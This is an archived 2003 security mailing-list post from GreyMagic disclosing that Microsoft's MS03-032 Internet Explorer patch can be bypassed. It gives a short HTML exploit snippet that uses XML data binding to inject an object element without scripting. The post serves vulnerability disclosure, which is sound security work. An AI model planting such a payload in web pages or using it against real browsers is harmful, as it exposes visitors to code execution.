[VulnWatch] RE: BAD NEWS: Microsoft Security Bulletin MS03-032

From: GreyMagic Software (security_at_greymagic.com)
Date: 09/08/03

  • Next message: Marc Maiffret: "[VulnWatch] EEYE: Microsoft RPC Heap Corruption Vulnerability - Part II"
    To: "NTBugtraq" <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>, "Bugtraq" <bugtraq@securityfocus.com>, <full-disclosure@lists.netsys.com>, <vulnwatch@vulnwatch.org>
    Date: Mon, 8 Sep 2003 16:52:12 +0200
    
    

    >The patch for Drew's object data=funky.hta doesn't work:

    This is the exact same issue as http://greymagic.com/adv/gm001-ie/, which
    explains the problem in detail. Microsoft again patches the object element
    in HTML, but it doesn't patch the dynamic version of that same element.

    >1. Disable Active Scripting

    This actually means that no scripting is needed at all in order to exploit
    this amazingly critical vulnerability:

    <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
    <xml id="oExec">
        <security>
            <exploit>
                <![CDATA[
                <object data=x.asp></object>
                ]]>
            </exploit>
        </security>
    </xml>

    Ouch.


  • Next message: Marc Maiffret: "[VulnWatch] EEYE: Microsoft RPC Heap Corruption Vulnerability - Part II"

    Relevant Pages

    • Re: Help putting standard headers on all pages
      ... scripting between the parent document and the "entirely independent" ... embedded document in the object element. ... An static html page from the same domain isn't ... And scripting is more secure than an static html page? ...
      (comp.infosystems.www.authoring.html)
    • Re: accessing a document within a document
      ... Martin Eyles wrote: ... html or svg or vml page. ... I would like to access elements within this sub-page from javascript in the parent page. ... With Mozilla and Opera the object element DOM object has a property named contentDocument: ...
      (comp.lang.javascript)
    • [Full-Disclosure] RE: BAD NEWS: Microsoft Security Bulletin MS03-032
      ... Microsoft again patches the object element ... in HTML, but it doesn't patch the dynamic version of that same element. ...
      (Full-Disclosure)
    • updating data in object
      ... First I have an object element: ... then a script: ... function first() { ... where works is when the new html replaces the old ...
      (comp.lang.javascript)
    • RE: BAD NEWS: Microsoft Security Bulletin MS03-032
      ... Microsoft again patches the object element ... in HTML, but it doesn't patch the dynamic version of that same element. ...
      (Bugtraq)